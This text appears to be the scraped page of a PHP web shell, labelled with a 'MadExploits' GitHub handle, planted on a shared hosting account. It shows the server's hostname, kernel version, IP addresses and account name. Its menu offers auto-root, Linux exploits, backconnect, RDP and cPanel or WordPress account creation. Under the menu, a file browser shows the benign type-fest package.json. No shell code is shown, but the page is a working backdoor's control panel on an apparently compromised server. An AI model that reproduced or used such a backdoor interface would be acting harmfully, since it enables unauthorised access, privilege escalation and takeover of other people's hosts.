Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
public_html /
node_modules /
type-fest /
[ HOME SHELL ]
Name
Size
Permission
Action
source
[ DIR ]
dr-xr-xr-x
ts41
[ DIR ]
dr-xr-xr-x
base.d.ts
1.72
KB
-rw-r--r--
index.d.ts
115
B
-rw-r--r--
license
1.09
KB
-rw-r--r--
package.json
1.02
KB
-rw-r--r--
readme.md
33.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "type-fest", "version": "0.21.3", "description": "A collection of essential TypeScript types", "license": "(MIT OR CC0-1.0)", "repository": "sindresorhus/type-fest", "funding": "https://github.com/sponsors/sindresorhus", "author": { "name": "Sindre Sorhus", "email": "sindresorhus@gmail.com", "url": "https://sindresorhus.com" }, "engines": { "node": ">=10" }, "scripts": { "test": "xo && tsd && tsc" }, "files": [ "index.d.ts", "base.d.ts", "source", "ts41" ], "keywords": [ "typescript", "ts", "types", "utility", "util", "utilities", "omit", "merge", "json" ], "devDependencies": { "@sindresorhus/tsconfig": "~0.7.0", "expect-type": "^0.11.0", "tsd": "^0.14.0", "typescript": "^4.1.3", "xo": "^0.36.1" }, "types": "./index.d.ts", "typesVersions": { ">=4.1": { "*": [ "ts41/*" ] } }, "xo": { "rules": { "@typescript-eslint/ban-types": "off", "@typescript-eslint/indent": "off", "node/no-unsupported-features/es-builtins": "off" } } }
Close